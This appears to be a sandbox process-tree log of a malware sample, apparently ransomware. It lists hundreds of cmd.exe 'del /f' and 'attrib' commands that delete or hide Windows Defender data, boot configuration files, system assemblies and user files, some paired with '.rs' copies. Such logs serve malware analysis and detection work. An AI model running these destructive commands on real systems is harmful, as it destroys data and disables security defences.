C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e1c243c2d74f251193b33ee487953c18\Microsoft.Isam.Esent.Interop.Wsa.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jtx""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Interop.Word\15.0.0.0__71e9bce111e9429c\Microsoft.Office.Interop.Word.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\ClickToRun\ProductReleases\EA92A936-8165-4F03-AFAE-D997D3F16044\mergedVirtualRegistry.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\bs-Latn-BA\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\92.0.902.62\92.0.902.62.manifest""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W79a81d80#\99d606cd0e3f240774d6c19e17a3aa4f\Microsoft.Windows.Diagnosis.Commands.WriteDiagTelemetry.ni.dll""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\397ac76c4726f0c3fcb73e847d427069\Microsoft.Windows.Diagnosis.SDHost.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\d1610485e1b07578a37d0e066a8cb06d\Microsoft.PowerShell.Security.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\bea1ec8001c04b6bd173404eb454f1b2\Microsoft.WindowsSearch.Commands.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\9c524c1ccd98613267446654e1bcaeec\Microsoft.PowerShell.Commands.Utility.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\Resource\{3A53D230-71AE-42DC-B4A0-91363EBF0B8D}""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Conversion.v3.5.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\978615d39859ab304afb26b47035fe2b\Microsoft.GroupPolicy.Reporting.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationBuildTasks.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\ca-ES\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VSTO\vstoee90.tlb""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.2106.6-0\com.microsoft.defender.be.chrome.json""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}\92.0.902.62\MicrosoftEdge_X64_92.0.902.62_92.0.902.55.exe""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpasbase.vdm""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-909609370C487E78DE979D5EBA4DD3859F29B1B3.bin""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\AggregatorStorage\UpdatePolicyScenarioReliabilityAggregator$""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\Documents\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\29487c610e1721bc4f2a69e82cd94776\Microsoft.PowerShell.Security.Activities.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\All Users\Microsoft\Diagnosis\AggregatorStorage\FailoverSignalAggregator$""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\Documents\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\AggregatorStorage\FailoverSignalAggregator$.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\9e133bbc9f4cb533cde9604cb428d9ca\Microsoft.PowerShell.Management.Activities.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1001\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1001\desktop.ini"4⤵
- Drops desktop.ini file(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1001\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\Ole DB\msdaps.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\Diagtrack-Listener.etl.003""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\Diagtrack-Listener.etl.003""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Diagnosis\EventStore.db""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files\Common Files\System\Ole DB\msdaosp.dll""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Program Files\Common Files\System\Ole DB\msdaosp.dll"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Diagnosis\EventStore.db""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\Ole DB\msdaosp.dll.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Boot\BCD.LOG""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Boot\BCD.LOG.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Boot\BCD.LOG""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\Boot\BCD.LOG"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Boot\BCD""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Boot\BCD.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\103ba7ea0c8f19319e2d6c68769f1ee1\Microsoft.PowerShell.Management.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Office\ClickToRunPackageLocker""3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\4e3cf34e778a3e19c441eb0110f744bf\Microsoft.GroupPolicy.AdmTmplEditor.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\19\0""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2106.6-0\ca-ES-valencia\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\NTUSER.DAT{5da70f0b-eb4a-11eb-b8af-ceb2b35da2fd}.TMContainer00000000000000000001.regtrans-ms""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Interop.SmartTag\15.0.0.0__71e9bce111e9429c\Microsoft.Office.Interop.SmartTag.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\1cf2958f3d5e8e0b0fb26a6dc3d5a6cc\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2106.6-0\bs-Latn-BA\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\bopomofo.nlp""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2106.6-0\ca-ES\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-07222021-031535-7-1ff-22000.1.amd64fre.co_release.210604-1628.etl""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\34c7012f0fcab354f0ea5b9292a3f3fd\Microsoft.PowerShell.Utility.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Program Files (x86)\desktop.ini""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Program Files (x86)\desktop.ini"4⤵
- Drops desktop.ini file(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\0ecdf8db179adc1cb03ae3198c50c366\Microsoft.PowerShell.Commands.Diagnostics.ni.dll.aux""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Office.Interop.PowerPoint\15.0.0.0__71e9bce111e9429c\Microsoft.Office.Interop.PowerPoint.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\NTUSER.DAT{5da70f0b-eb4a-11eb-b8af-ceb2b35da2fd}.TM.blf""3⤵
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\NTUSER.DAT{5da70f0b-eb4a-11eb-b8af-ceb2b35da2fd}.TM.blf"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Office\ClickToRunPackageLocker""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\Desktop\desktop.ini"4⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\Microsoft\Office\ClickToRunPackageLocker"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\microsoft shared\VGX\VGX.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\microsoft shared\VGX\VGX.dll""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Program Files\Common Files\microsoft shared\VGX\VGX.dll"4⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\ado\adojavas.inc""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\System\ado\adojavas.inc""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\AppData\Local\IconCache.db""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\Ole DB\msdaosp.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\880a86942764780dcae3a9ff64fa1ad0\Microsoft.Management.Infrastructure.Native.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\9e133bbc9f4cb533cde9604cb428d9ca\Microsoft.PowerShell.Management.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416""3⤵
-
C:\Windows\system32\attrib.exeattrib -h -r -s "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35\Microsoft.ManagementConsole.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\Common Files\System\Ole DB\msdaosp.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2106.6-0\am-ET\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\648ec19820fdac1518cff9e6e6b30aee\Microsoft.KeyDistributionService.Cmdlets.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Support\MPDetection-20210722-170812.log""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.JScript\8.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\29487c610e1721bc4f2a69e82cd94776\Microsoft.PowerShell.Security.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\7ae81cf5ef96a6efc2650bb54156e34f\Microsoft.Isam.Esent.Interop.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini.rs""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2106.6-0\af-ZA\mpuxagent.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\1353bf927c66f7a5fb76355aad5c755e\Microsoft.PowerShell.Activities.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Ink.Resources\6.1.0.0_en_31bf3856ad364e35\Microsoft.Ink.Resources.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Users\Admin\NTUSER.DAT{5da70f0b-eb4a-11eb-b8af-ceb2b35da2fd}.TM.blf""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\10a8e1e9dcd705dd0a04dce845795a93\Microsoft.Isam.Esent.Interop.Wsa.ni.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\All Tasks.lnk""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1001\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\InkDiv.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -h -r -s "C:\Program Files (x86)\Common Files\Microsoft Shared\ink\InkDiv.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Program Files\Common Files\System\en-US\wab32res.dll.mui""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\$Recycle.Bin\S-1-5-18\desktop.ini""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Utilities\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Tasks.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tasks.v3.5.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_64\System.Printing\3.0.0.0__31bf3856ad364e35\System.Printing.dll""3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll""3⤵
-
C:\Windows\system32\attrib.exeattrib -h "C:\$Recycle.Bin\S-1-5-21-257790753-2419383948-818201544-1000\desktop.ini"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del /f "C:\ProgramData\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_DeviceProvisioning_2021_7_25_20_48_30.etl""3⤵
-
